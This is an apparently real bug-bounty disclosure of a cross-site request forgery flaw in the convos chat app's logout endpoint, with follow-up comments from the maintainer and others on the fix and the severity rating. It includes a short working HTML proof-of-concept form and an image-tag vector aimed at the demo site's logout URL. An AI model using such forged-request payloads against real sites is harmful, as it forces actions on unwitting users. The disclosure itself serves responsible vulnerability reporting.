Cross-Site Request Forgery (CSRF) in convos-chat/convos
Reported on
Dec 11th 2021
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.convos.chat/logout">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
This vulnerability is capable of forging users to unintentional logout.
More Detail
One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
Occurrences
@admin Please contact on contact@convos.chat to the maintainer.
SECURITY.md
2 years ago
@dev696 - I have commented on the GitHub Issue! I have shared the report URL with them if they want to view the report directly. Otherwise, once they have added an e-mail to the SECURITY.md, they will receive a magic link to access the page.
@Jamie, I believe we can considered the shared email "contact@convos.chat" You can share all the details as this is the main contact. Also the URL is private and cannot be viewed. Thanks for your support as always.
Thanks for reporting this through e-mail, instead of posting it online before having a chance to fix it.
I did consider this a minor issue. I think even bigger sites like Google also does not protect the /logout endpoint. Nevertheless, the fix was simple to add, so why not? :)
Hey @dev696,
A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself.
Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. The convos' s users will be shocked if they know that their app has a High vulnerability with the impact is just logging out a user with no affected on the account, just an annoyance!